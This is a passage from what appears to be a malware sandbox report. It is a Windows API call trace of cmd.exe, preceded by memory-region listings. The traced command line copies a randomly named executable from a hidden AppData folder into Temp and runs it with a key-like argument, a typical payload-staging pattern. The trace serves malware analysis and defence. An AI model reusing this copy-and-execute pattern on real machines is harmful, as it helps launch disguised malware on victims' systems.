"pagefile_0x0000000000010000" filename = "" Region: id = 698 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 699 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 700 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 701 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 702 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 703 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 704 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 705 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 706 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 707 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 708 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 709 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 710 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 711 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 712 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 713 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 714 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 715 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 716 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 717 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 718 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 719 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 720 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 773 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 12 os_tid = 0xb10 [0094.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff0c | out: lpSystemTimeAsFileTime=0x20ff0c*(dwLowDateTime=0x77064000, dwHighDateTime=0x1d440a9)) [0094.142] GetCurrentProcessId () returned 0xb0c [0094.142] GetCurrentThreadId () returned 0xb10 [0094.142] GetTickCount () returned 0x22d46 [0094.142] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff04 | out: lpPerformanceCount=0x20ff04*=15093151171) returned 1 [0094.143] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0094.143] __set_app_type (_Type=0x1) [0094.143] __p__fmode () returned 0x76b331f4 [0094.143] __p__commode () returned 0x76b331fc [0094.143] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0094.143] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0094.143] GetCurrentThreadId () returned 0xb10 [0094.143] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb10) returned 0x38 [0094.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.143] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0094.143] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.143] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.144] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fe9c | out: phkResult=0x20fe9c*=0x0) returned 0x2 [0094.144] VirtualQuery (in: lpAddress=0x20fed3, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.144] GetConsoleOutputCP () returned 0x1b5 [0094.144] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.144] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0094.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.144] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0094.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.144] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.144] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.144] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0094.145] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.145] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.145] GetEnvironmentStringsW () returned 0x240370* [0094.145] FreeEnvironmentStringsW (penv=0x240370) returned 1 [0094.145] GetEnvironmentStringsW () returned 0x240370* [0094.145] FreeEnvironmentStringsW (penv=0x240370) returned 1 [0094.145] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee0c | out: phkResult=0x20ee0c*=0x40) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x20, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x0, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.145] RegCloseKey (hKey=0x40) returned 0x0 [0094.145] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee0c | out: phkResult=0x20ee0c*=0x40) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x0, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x9, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x9, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x9, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.146] RegCloseKey (hKey=0x40) returned 0x0 [0094.146] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886349 [0094.146] srand (_Seed=0x5b886349) [0094.146] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0094.146] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0094.146] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.146] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x241ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0094.146] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.146] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.146] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.146] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.146] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.147] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.147] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.147] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.147] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.147] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.147] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.147] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.147] GetEnvironmentStringsW () returned 0x2424c0* [0094.147] FreeEnvironmentStringsW (penv=0x2424c0) returned 1 [0094.147] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.147] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.147] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.147] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.147] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.147] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.147] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.147] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.147] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.147] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.147] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fbd8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.147] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fbd8, lpFilePart=0x20fbd4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fbd4*="Desktop") returned 0x18 [0094.147] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.147] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f954 | out: lpFindFileData=0x20f954) returned 0x240b50 [0094.147] FindClose (in: hFindFile=0x240b50 | out: hFindFile=0x240b50) returned 1 [0094.148] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f954 | out: lpFindFileData=0x20f954) returned 0x240b50 [0094.148] FindClose (in: hFindFile=0x240b50 | out: hFindFile=0x240b50) returned 1 [0094.148] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f954 | out: lpFindFileData=0x20f954) returned 0x240b50 [0094.148] FindClose (in: hFindFile=0x240b50 | out: hFindFile=0x240b50) returned 1 [0094.148] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.148] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0094.148] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0094.148] GetEnvironmentStringsW () returned 0x240370* [0094.148] FreeEnvironmentStringsW (penv=0x240370) returned 1 [0094.148] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.149] GetConsoleOutputCP () returned 0x1b5 [0094.149] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.149] GetUserDefaultLCID () returned 0x409 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fd18, cchData=128 | out: lpLCData="0") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fd18, cchData=128 | out: lpLCData="0") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fd18, cchData=128 | out: lpLCData="1") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0094.150] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.150] GetConsoleTitleW (in: lpConsoleTitle=0x230a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.151] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0094.151] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0094.151] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0094.151] _wcsicmp (_String1="type", _String2=")") returned 75 [0094.151] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0094.151] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0094.151] _wcsicmp (_String1="IF", _String2="type") returned -11 [0094.151] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0094.151] _wcsicmp (_String1="REM", _String2="type") returned -2 [0094.151] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0094.155] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 68 [0094.155] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 68 [0094.155] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 71 [0094.155] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 71 [0094.155] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 80 [0094.155] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 80 [0094.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.158] GetFileType (hFile=0x7) returned 0x2 [0094.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.158] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20fbac | out: lpMode=0x20fbac) returned 1 [0094.158] _dup (_FileHandle=1) returned 3 [0094.158] _close (_FileHandle=1) returned 0 [0094.158] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", _String2="con") returned -53 [0094.158] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x20fb7c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0094.159] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0094.159] GetConsoleTitleW (in: lpConsoleTitle=0x20f9ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.159] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0094.159] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0094.159] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0094.159] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0094.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.160] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x20f510, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f510) returned 0x230f58 [0094.160] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0094.160] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0094.160] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0094.160] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x20e41c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0094.161] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] GetFileType (hFile=0x54) returned 0x1 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x20e474 | out: lpFileSizeHigh=0x20e474*=0x0) returned 0x7d600 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.161] GetFileType (hFile=0x4c) returned 0x1 [0094.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.161] GetFileType (hFile=0x4c) returned 0x1 [0094.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.161] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 